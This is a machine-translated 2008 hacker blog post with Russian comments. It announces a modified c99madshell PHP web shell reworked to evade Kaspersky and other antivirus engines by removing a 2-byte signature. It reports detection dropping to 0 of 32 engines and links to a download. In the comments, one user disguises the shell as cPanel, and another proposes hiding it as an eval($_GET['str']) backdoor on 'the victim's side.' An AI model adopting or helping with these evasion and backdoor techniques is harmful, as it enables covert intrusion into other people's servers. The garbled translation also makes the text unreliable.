s99madshell bypassing Kaspersky

17, мая, 2008

Some time ago, Kaspersky, and something which other antivirus, exchange signatures, have begun to determine the shell as bad application, in principle nothing wrong because it did not happen, t . K. not where they are antivirus server, but still unpleasant, so lay modified version. Search signature definition script brought a lot of fun signature was platitudes, is 2 bytes at offset 10 bytes from the end of the file, so remove the shell from the base took 5 seconds.

Results of testing the previous version:
Result: 3 / 32 (9.38%)
F-Secure 6.70.13260.0 2008.05.17 Backdoor.PHP.Rst.ak
GData 2.0.7306.1023 2008.05.17 Backdoor. PHP.Rst.ak
Kaspersky 7.0.0.125 2008.05.17 Backdoor.PHP.Rst.ak

results of testing the current version:
Result: 0 / 32 (0 %)

Download shell can be the old address

http://madnet.name/files/1/10.html

back | main page | rss комментариев

comments:

x-demon

У тебя РСС криво пашет. Выбросило на /news/49 а надо то на /news/49.html
З.Ы. и выложи сорец шелла. А то я его под cpanel маскирую, а распаковывать твою защиту задаче та еще.

~~~~~~~~~~~~~

gzip там

он же пишет))

~~~~~~~~~~~~~

Nek1t

Что теперь не палицца AV - хорошо, но ты убрал $login и $pass в gzip :( Верни обратно...

~~~~~~~~~~~~~

madnet

Nek1t, на месте.

~~~~~~~~~~~~~

dr.Teo

зря на вирустотал залил, скоро опять запалят его

~~~~~~~~~~~~~

madnet

dr.Teo, запарятся )

~~~~~~~~~~~~~

Nek1t

madnet, спс. Слушай, а может вернешь в шелл декодер? Ну в оригинальном c99 был перекодировщик который из/в base64 перегонял, md5 считал... Удобно было очень.

~~~~~~~~~~~~~

anty

Спсаибо.

~~~~~~~~~~~~~

asshole

Ok.

~~~~~~~~~~~~~

a6y

Есть идея резделить твой шелл на клиент - сервер. Сейчас как раз этим занимаюсь =) Суть простая - все команды перевести в "стринги" и слать на скрипт с eval($_GET['str']); на стороне жертвы. Получица тот же самый шелл,но спрятать его будет в разы легче... Единственная проблема - дамп базы =(( Никак не получается его реализовать =(( Может подкинешь идею?! =)

~~~~~~~~~~~~~

Tellur

Касперский устроил мне панику на весь ноут)
http://www.securelist.com/ru/search?VN=Backdoor.PH P.C99Shell.bf

С этим надо что-то делать)

~~~~~~~~~~~~~

back | main page | rss комментариев

Send your comment:

Name:
Comment:


	TOP TOPICS c99madshell madSS \| Skanner site structure... I love the magazine Hacker ?! madSpamer script Hack Search - search engine fo... Flaine writes nonsense Meylru ebnulos !? Opening ... Save Windows XP ! xss l


	BUGS SEARCH


	MAIN PROJECTS GmadS - Online web scanner c99madshell - webshell P2GmadGEN - Online requests generator FREE SOCKS5 - free proxy servers Mssql password decoder


	FRIENDS http://cih.ms http://forum.antichat.ru http://www.n-e-r-d.ru

Translated with Google. Sorry for bad English.

38.107.179.226

s99madshell bypassing Kaspersky

TOP TOPICS

BUGS SEARCH

MAIN PROJECTS

FRIENDS